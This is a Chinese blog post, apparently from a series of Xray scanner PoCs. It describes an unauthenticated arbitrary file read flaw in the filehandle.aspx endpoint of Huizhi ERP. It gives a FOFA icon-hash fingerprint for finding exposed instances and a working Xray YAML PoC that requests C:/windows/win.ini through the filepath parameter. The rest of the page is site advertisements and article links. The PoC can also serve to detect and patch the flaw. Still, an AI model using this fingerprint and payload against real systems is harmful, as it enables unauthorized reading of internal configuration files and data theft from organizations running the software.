汇智ERP接口filehandle.aspx存在任意文件读取漏洞
参考链接:https://github.com/wy876/POC/blob/main/%E6%B1%87%E6%99%BAERP/%E6%B1%87%E6%99%BAERP%E6%8E%A5%E5%8F%A3filehandle.aspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
漏洞介绍:
汇智ERP filehandle.aspx 接口处任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,造成信息泄露,导致系统处于极不安全的状态。
资产指纹:
icon_hash="-642591392"
Xray-poc:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | name: poc-yaml-huizhi-erp-filehandle-filedownload transport: http rules: r0: request: method: GET path: /nssys/common/filehandle.aspx?filepath=C%3a%2fwindows%2fwin%2ein follow_redirects: false expression: >- response.status == 200 && response.body_string.contains(" for 16-bit app support") expression: r0() detail: author: Cysec links: - >- https: //github.com/wy876/POC/blob/main/%E6%B1%87%E6%99%BAERP/%E6%B1%87%E6%99%BAERP%E6%8E%A5%E5%8F%A3filehandle.aspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md description: 汇智ERP接口filehandle.aspx存在任意文件读取漏洞 fofakeyword: icon_hash= "-642591392" |
分类:
Xray-Poc日常编写
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 清华大学推出第四讲使用 DeepSeek + DeepResearch 让科研像聊天一样简单!
· 推荐几款开源且免费的 .NET MAUI 组件库
· 实操Deepseek接入个人知识库
· 易语言 —— 开山篇
· Trae初体验